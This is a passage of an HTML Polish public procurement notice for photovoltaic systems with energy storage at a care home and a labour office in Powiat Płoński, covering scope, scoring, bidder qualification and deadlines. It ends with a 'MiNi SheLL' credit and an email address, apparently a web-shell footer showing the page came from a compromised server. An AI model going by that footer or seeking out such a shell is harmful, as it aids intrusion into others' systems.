określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznych wraz z magazynami energii dla budynków użyteczności publicznej w Powiecie Płońskim. Zamówienie podzielono na części w tym<br/>Część 2 zamówienia: Budynek Domu Pomocy Społecznej w Karolinowie, Karolinowo 38, 09-120 Nowe Miasto<br/>2. Instalacja fotowoltaiczna objęta przedmiotem zamówienia powinna działać w systemie off-grid (niepodłączona do elektroenergetycznej sieci dystrybucyjnej).<br/>Przedmiot zamówienia swoim zakresem obejmuje:<br/>1)	prace przygotowawcze przed dostawą i montażem instalacji fotowoltaicznej, w tym:<br/>˗	roboty pomiarowe związane z inwentaryzacją przebiegu istniejących instalacji, istniejącej rozdzielni elektrycznej oraz lokalizacji urządzeń w obszarach przewidzianych pod montaż urządzeń i infrastruktury, celem potwierdzenia poprawności doboru urządzenia<br/>2)	przygotowanie dokumentacji projektowej, wraz z uzyskaniem wszelkich niezbędnych zgód, pozwoleń i uzgodnień wymaganych przepisami prawa<br/>3)	dostawę i montaż do wyznaczonych miejsc nowej instalacji fotowoltaicznej, w tym<br/>˗	dostawa i montaż konstrukcji wsporczych (dachowych w przypadku części zamówienia dotyczącej montażu na dachu, lub wolnostojącej w przypadku montażu na gruncie)<br/>˗	dostawa i montaż paneli fotowoltaicznych.<br/>˗	dostawa i montaż inwerterów (falowników) hybrydowych współpracujących z systemem magazynowania.<br/>˗	dostawa i montaż dedykowanych magazynów energii, wraz z przystosowaniem pomieszczenia przeznaczonego na magazyn do obecnie obowiązujących przepisów i warunków technicznych<br/>˗	wykonanie niezbędnych prac ziemnych i towarzyszących prac budowlanych<br/>4)	dokonanie przyłączenia instalacji fotowoltaicznej w tym<br/>˗	wykonanie okablowania DC i AC wraz z zabezpieczeniami dla systemów PV i ME<br/>˗	wykonanie tras kablowych i przyłączenie instalacji PV i ME do wewnętrznej sieci Zamawiającego.<br/>˗	integracja systemów PV z magazynami energii i siecią elektroenergetyczną.<br/>˗	dostawa i montaż systemów zarządzania energią i monitoringu dla PV i ME.<br/>˗	przeprowadzenie testów, pomiarów i uruchomienie kompletnych systemów PV+ME.<br/>˗	uzyskanie niezbędnych pozwoleń, zgód i dokonanie odbiorów (w tym u Operatora Systemu Dystrybucyjnego).<br/>5)	przeprowadzenie szkolenia pracowników ww. urzędów i jednostek organizacyjnych w zakresie obsługi kompletnej instalacji i zintegrowanych urządzeń wraz z podzespołami oraz wsparcie techniczne.<br/>6)	przygotowanie dokumentacji powykonawczej, która swoim zakresem obejmować będzie m.in. dane techniczne instalacji fotowoltaicznej, schematy podłączenia, karty materiałowe instalacji, instrukcje BHP, instrukcję serwisową urządzeń, wymagane potwierdzenia zgodności, projekt techniczny z naniesionymi zmianami (jeśli takowe wystąpią) oraz wszelkie inne dokumenty i opracowania niezbędne do przekazania inwestycji do użytkowania i eksploatacji.<br/>6.	Wszystkie postanowienia SWZ dotyczą w takim samym zakresie pierwszej, drugiej i trzeciej części zamówienia, chyba, że zastrzeżono inaczej.<br/>7.	Jeżeli w SWZ lub załącznikach do niej w szczególności w opisie przedmiotu zamówienia użyte zostały znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę mają one wyłącznie charakter przykładowy, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostawy, aby spełnić wymagania stawiane przez Zamawiającego. Należy przyjąć, iż stanowią one tylko wskazania i mają na celu jedynie doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania, a Wykonawca nie jest zobowiązany do ich zastosowania. Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w SWZ lub załącznikach do niej, zawarto odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>8.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie z SWZ, załącznikami do niej oraz obowiązującymi normami i standardami.<br/>9.	Wykonawca oświadcza, że posiada wiedzę i doświadczenie gwarantujące należyte wykonanie przedmiotu zamówienia. <br/>10.	Szczegółowy opis przedmiotu zamówienia określający w szczególności ilość, parametry i wymagania Zamawiającego co do przedmiotu dostawy zawarty został w Załączniku Nr 9 i Załącznikach nr 9.1 (załączniki do OPZ) do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09332000-5 - Instalacje słoneczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331000-8 - Baterie słoneczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>1) cena oferty (C) - 60%<br/>2) okres gwarancji (G) - 40 %<br/>Informacja o sposobie oceny ofert.<br/>1) Cena oferty (C) 60% - 60 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>Cena najniższa/cena badana x 60= ilość punktów w kryterium cena<br/>Kryterium oferty będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w<br/>formularzu Oferty. Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>2) Okres gwarancji (G) 40% - 40 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższych postanowień:<br/>Gwarancja badana/gwarancja najdłuższa x 40= ilość punktów w kryterium cena<br/>Kryterium „ okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji jakości na zrealizowany<br/>przedmiot zamówienia podanej przez Wykonawcę w formularzu oferty. Okres gwarancji liczony jest od daty dnia podpisania<br/>protokołu odbioru przedmiotu zamówienia.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 36 miesięcy,<br/>zaś okres maksymalny to 60 miesięcy. Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w pełnych<br/>miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 36 miesięcy. Oznacza to, że Wykonawca otrzyma punkty za w/w<br/>kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 36 miesięcy. W przypadku zaoferowania minimalnego,<br/>wymaganego okresu gwarancji (36 miesięcy) Wykonawca otrzyma 0 pkt w ww. kryterium oceny ofert. Maksymalny okres gwarancji<br/>podlegający punktacji to 60 miesięcy. Oznacza to, że Wykonawca, który zaproponuje 60 miesięcy gwarancji otrzyma maksymalną<br/>liczbę punktów w tym kryterium tj 40 pkt. Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach,<br/>wówczas Zamawiający przyjmie minimalny okres gwarancji wynoszący 36 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „okres<br/>gwarancji”. W przypadku zadeklarowania w formularzu oferty okresu gwarancji mniejszego niż 36 miesięcy, Zamawiający odrzuci<br/>ofertę ponieważ jej treść nie będzie zgodna z warunkami Zamówienia.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium ,,cena „ i ,,okres gwarancji” według poniższego wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane z dokładnością do dwóch miejsc po<br/>przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznych wraz z magazynami energii dla budynków użyteczności publicznej w Powiecie Płońskim. Zamówienie podzielono na części w tym<br/>Część 3 zamówienia: Budynek Powiatowego Urzędu Pracy w Płońsku przy ul. Wolności 12, 09-100 Płońsk<br/><br/>2. Instalacja fotowoltaiczna objęta przedmiotem zamówienia powinna działać w systemie off-grid (niepodłączona do elektroenergetycznej sieci dystrybucyjnej).<br/>Przedmiot zamówienia swoim zakresem obejmuje:<br/>1)	prace przygotowawcze przed dostawą i montażem instalacji fotowoltaicznej, w tym:<br/>˗	roboty pomiarowe związane z inwentaryzacją przebiegu istniejących instalacji, istniejącej rozdzielni elektrycznej oraz lokalizacji urządzeń w obszarach przewidzianych pod montaż urządzeń i infrastruktury, celem potwierdzenia poprawności doboru urządzenia<br/>2)	przygotowanie dokumentacji projektowej, wraz z uzyskaniem wszelkich niezbędnych zgód, pozwoleń i uzgodnień wymaganych przepisami prawa<br/>3)	dostawę i montaż do wyznaczonych miejsc nowej instalacji fotowoltaicznej, w tym<br/>˗	dostawa i montaż konstrukcji wsporczych (dachowych w przypadku części zamówienia dotyczącej montażu na dachu, lub wolnostojącej w przypadku montażu na gruncie)<br/>˗	dostawa i montaż paneli fotowoltaicznych.<br/>˗	dostawa i montaż inwerterów (falowników) hybrydowych współpracujących z systemem magazynowania.<br/>˗	dostawa i montaż dedykowanych magazynów energii, wraz z przystosowaniem pomieszczenia przeznaczonego na magazyn do obecnie obowiązujących przepisów i warunków technicznych<br/>˗	wykonanie niezbędnych prac ziemnych i towarzyszących prac budowlanych<br/>4)	dokonanie przyłączenia instalacji fotowoltaicznej w tym<br/>˗	wykonanie okablowania DC i AC wraz z zabezpieczeniami dla systemów PV i ME<br/>˗	wykonanie tras kablowych i przyłączenie instalacji PV i ME do wewnętrznej sieci Zamawiającego.<br/>˗	integracja systemów PV z magazynami energii i siecią elektroenergetyczną.<br/>˗	dostawa i montaż systemów zarządzania energią i monitoringu dla PV i ME.<br/>˗	przeprowadzenie testów, pomiarów i uruchomienie kompletnych systemów PV+ME.<br/>˗	uzyskanie niezbędnych pozwoleń, zgód i dokonanie odbiorów (w tym u Operatora Systemu Dystrybucyjnego).<br/>5)	przeprowadzenie szkolenia pracowników ww. urzędów i jednostek organizacyjnych w zakresie obsługi kompletnej instalacji i zintegrowanych urządzeń wraz z podzespołami oraz wsparcie techniczne.<br/>6)	przygotowanie dokumentacji powykonawczej, która swoim zakresem obejmować będzie m.in. dane techniczne instalacji fotowoltaicznej, schematy podłączenia, karty materiałowe instalacji, instrukcje BHP, instrukcję serwisową urządzeń, wymagane potwierdzenia zgodności, projekt techniczny z naniesionymi zmianami (jeśli takowe wystąpią) oraz wszelkie inne dokumenty i opracowania niezbędne do przekazania inwestycji do użytkowania i eksploatacji.<br/>6.	Wszystkie postanowienia SWZ dotyczą w takim samym zakresie pierwszej, drugiej i trzeciej części zamówienia, chyba, że zastrzeżono inaczej.<br/>7.	Jeżeli w SWZ lub załącznikach do niej w szczególności w opisie przedmiotu zamówienia użyte zostały znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę mają one wyłącznie charakter przykładowy, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostawy, aby spełnić wymagania stawiane przez Zamawiającego. Należy przyjąć, iż stanowią one tylko wskazania i mają na celu jedynie doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania, a Wykonawca nie jest zobowiązany do ich zastosowania. Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w SWZ lub załącznikach do niej, zawarto odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>8.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie z SWZ, załącznikami do niej oraz obowiązującymi normami i standardami.<br/>9.	Wykonawca oświadcza, że posiada wiedzę i doświadczenie gwarantujące należyte wykonanie przedmiotu zamówienia. <br/>10.	Szczegółowy opis przedmiotu zamówienia określający w szczególności ilość, parametry i wymagania Zamawiającego co do przedmiotu dostawy zawarty został w Załączniku Nr 9 i Załącznikach nr 9.1 (załączniki do OPZ) do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09332000-5 - Instalacje słoneczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331000-8 - Baterie słoneczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>1) cena oferty (C) - 60%<br/>2) okres gwarancji (G) - 40 %<br/>Informacja o sposobie oceny ofert.<br/>1) Cena oferty (C) 60% - 60 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>Cena najniższa/cena badana x 60= ilość punktów w kryterium cena<br/>Kryterium oferty będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w<br/>formularzu Oferty. Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>2) Okres gwarancji (G) 40% - 40 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższych postanowień:<br/>Gwarancja badana/gwarancja najdłuższa x 40= ilość punktów w kryterium cena<br/>Kryterium „ okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji jakości na zrealizowany<br/>przedmiot zamówienia podanej przez Wykonawcę w formularzu oferty. Okres gwarancji liczony jest od daty dnia podpisania<br/>protokołu odbioru przedmiotu zamówienia.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 36 miesięcy,<br/>zaś okres maksymalny to 60 miesięcy. Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w pełnych<br/>miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 36 miesięcy. Oznacza to, że Wykonawca otrzyma punkty za w/w<br/>kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 36 miesięcy. W przypadku zaoferowania minimalnego,<br/>wymaganego okresu gwarancji (36 miesięcy) Wykonawca otrzyma 0 pkt w ww. kryterium oceny ofert. Maksymalny okres gwarancji<br/>podlegający punktacji to 60 miesięcy. Oznacza to, że Wykonawca, który zaproponuje 60 miesięcy gwarancji otrzyma maksymalną<br/>liczbę punktów w tym kryterium tj 40 pkt. Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach,<br/>wówczas Zamawiający przyjmie minimalny okres gwarancji wynoszący 36 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „okres<br/>gwarancji”. W przypadku zadeklarowania w formularzu oferty okresu gwarancji mniejszego niż 36 miesięcy, Zamawiający odrzuci<br/>ofertę ponieważ jej treść nie będzie zgodna z warunkami Zamówienia.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium ,,cena „ i ,,okres gwarancji” według poniższego wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane z dokładnością do dwóch miejsc po<br/>przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej jedno zamówienie publiczne obejmujące swoim zakresem dostawę i montaż instalacji fotowoltaicznej o mocy nie mniejszej niż 20 kWp, wraz z montażem magazynu energii. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający na podstawie art. 274 ust. 1, wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od wezwania aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wg wzoru Załącznik Nr 5 do SWZ),</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca do oferty ( wg wzoru- formularz oferty cenowej stanowiący Załącznik Nr 1 do SWZ) zobowiązany jest dołączyć:<br/>1)	oświadczenie Wykonawcy potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu ( wg wzoru Załącznik Nr 2 do SWZ)<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania lub w przypadku gdy Zamawiający może ww. dokumenty pozyskać za pomocą bezpłatnych i ogólnodostępnych baz danych wskazanie w Formularzu oferty cenowej danych umożliwiających dostęp do tych dokumentów. <br/>3)	pełnomocnictwo- jeżeli dotyczy<br/>4)	oświadczenia, o których mowa w pkt 3 i 4 – jeżeli dotyczy<br/>5)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia -jeżeli dotyczy(wg wzoru Załącznik nr 7 do SWZ)<br/>2.	Oświadczenie, o którym mowa w pkt 1 ppkt 1) tymczasowo zastępuje wymagane podmiotowe środki dowodowe i winno potwierdzać brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu na dzień składania ofert. Oświadczenie Wykonawca zobowiązany jest złożyć, pod rygorem nieważności w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o którym mowa w pkt 8 ppkt 1) także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się na jego zasoby(wg wzoru Załącznik Nr 3 do SWZ)<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu (wg wzoru Załącznik Nr 4 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w zakresie w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, z którego wynika, które dostawy wykonują poszczególni Wykonawcy (wg wzoru Załącznik Nr 6 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3) W przypadku warunku dotyczącego zdolności technicznej lub zawodowej;<br/>- w zakresie doświadczenia - Zamawiający uzna warunek za spełniony jeżeli wymaganym doświadczeniem wykaże się<br/>jeden z Wykonawców wspólnie ubiegających się lub wszyscy łącznie.<br/>4) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać, iż brak jest podstaw do jego<br/>wykluczenia z postępowania na podstawie art. 108 ust.1 ustawy Pzp oraz art. 7 ust. 1 pkt 1)-3) Ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego<br/>5) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (warunek zdolności<br/>technicznej lub zawodowej) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają dostawy, do których realizacji te uprawnienia są wymagane.<br/>6) W przypadku, o którym mowa w pkt 5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wwykonawcy. Wzór oświadczenia stanowi Załącznik<br/>Nr 6 do SWZ.<br/>7) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>8) Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przesłani i zasady zmian umowy określa ustawa Prawo zamówień publicznych oraz § 12 wzoru umowy (wg załącznika nr 8 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zadanie dofinansowano z dotacji celowej z budżetu Wojewody Mazowieckiego w ramach dotacji dla jednostek samorządu terytorialnego na realizację zadań z zakresu ochrony ludności i obrony cywilnej na rok 2025<br/>2. Zamawiający zastrzega możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie, nie zostaną mu przyznane, możliwość unieważnienia postępowania na tej podstawie została przewidziana w ogłoszeniu o zamówieniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com